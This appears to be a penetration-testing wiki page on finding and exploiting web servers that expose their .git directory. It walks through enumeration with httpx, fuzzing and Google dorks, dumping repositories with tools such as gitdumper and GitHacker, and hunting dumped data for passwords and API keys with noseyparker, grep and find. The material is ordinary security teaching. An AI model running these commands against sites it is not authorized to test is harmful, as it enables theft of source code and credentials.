Exposed Git Repositories

OWASP A3:2017-Sensitive Data Exposure

Theory

The exposure of Git repositories on a webserver often occurs due to misconfigurations, where the .git directory is left accessible without proper access controls.

If we encounter an application with an exposed .git directory, we can retrieve the entire repository. This enables us to extract valuable information, such as the remote repository address, commit history, logs, and various metadata. Accessing these details may reveal sensitive data, including proprietary code, hard-coded API keys, and credentials, which can then be leveraged to escalate our attack and further compromise the application's security.

Practice

Enumeration

To detect exposed Git repositories, we can utilize tools and commands below.

We may use httpx to identify exposed repositories across a list of domains using the command below. It checks if the .git/HEAD file contains refs/heads .

Note that this one-liner will only identify repositories if directory listing is enabled.

cat domains.txt | httpx -path /.git/HEAD -silent -mr "refs/heads"

When performing web directory fuzzing on a target with Feroxbuster or any other tool, using the common.txt wordlist from SecLists can help uncover any exposed .git directories.

feroxbuster -u http://target.com -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt

We can use the Google search engine to search for exposed .git repository with the following Google Dorks

intext:"index of" ".git"
{intitle: indexof/.git }
intitle:"index of" "/.git/config"
filetype:git -github.com inurl:"/.git"

This python script from GitTools identifies websites with publicly accessible .git repositories from a list of domains. It checks if the .git/HEAD file contains refs/heads.

./gitfinder.py -i domains.txt

Dump

Once an exposed Git repository is identified, the next step is to perform a repository dump to extract its contents.

gitdumper from GitTools can be used to download as much as possible from the found .git repository from webservers which do not have directory listing enabled.

./gitdumper.sh http://target.com/.git/ dest-dir

extractor.sh from GitTools can then be used in combination with gitdumper in case the downloaded repository is incomplete. This tool extract commits and their content from a broken repository.

./extractor.sh /tmp/mygitrepo /tmp/mygitrepodump

GitHacker (Python) is a multiple threads tool to exploit the .git folder leakage vulnerability.

# quick start
githacker --url http://127.0.0.1/.git/ --output-folder result
# brute for the name of branchs / tags
githacker --brute --url http://127.0.0.1/.git/ --output-folder result
# exploit multiple websites, one site per line
githacker --brute --url-file websites.txt --output-folder result

goop (Golang) is tool to dump a git repository from a website.

goop target.com

git-dumper (python) is a tool to dump a git repository from a website.

git-dumper http://target.com/.git ~/TargetOutputFolder

Hunting

After successfully dumping an exposed Git repository, the next step is to hunt for valuable secrets within the retrieved data.

Noseyparker

Noseyparker is a command-line program that finds secrets and sensitive information in textual data and Git history. We can use this tool to recursively search sensitive information in a repository.

# Scan filesystem / folder
noseyparker scan --datastore np.myDataStore /path/to/gitRepo

# Get results
noseyparker report -d np.myDataStore

You may use this tools to search sensitives files in a mounted NFS share, a mounted SMB share, or even exiltrated data.

Bash

Alternatively, find command can be use to find configuration files by recursively searching files with a specific extension or name and the grep command can be use to find passwords in files by recursively searching text patterns.

# Search for patterns in file
grep -ari 'password'
grep -ari 'api_key'
grep -ari 'api_key'

# Search for configuration/sensitive files
find / -type f -name *.conf 2>/dev/null
find / -type f -name *pass* 2>/dev/null

Sometimes, we can find HTTP credential in the remote repository URL

git config --get remote.origin.url

Even if Noseyparker can do it for us, we may manually search for sensitive informations in previous commits.

# Get list of commits
git log

# Get list of commits as a graph
git reflog

# Get list of commit filtred by authors
git log --author="John Doe"

# Check code change over two commits
git diff <FISRT_COMMIT_ID> <SECOND_COMMIT_ID>

# Checkout on a specific commit
git checkout <COMMIT_ID>

# Finally hunt for secrets on this new commit
cat secrets.txt
grep -ari 'password'
....

Resources

OWASP Top Ten 2017 | A3:2017-Sensitive Data Exposure | OWASP Foundation

Git Exposed — How to Identify and ExploitMedium

Exposed .git Directory ExploitationMedium

Last updated 1 month ago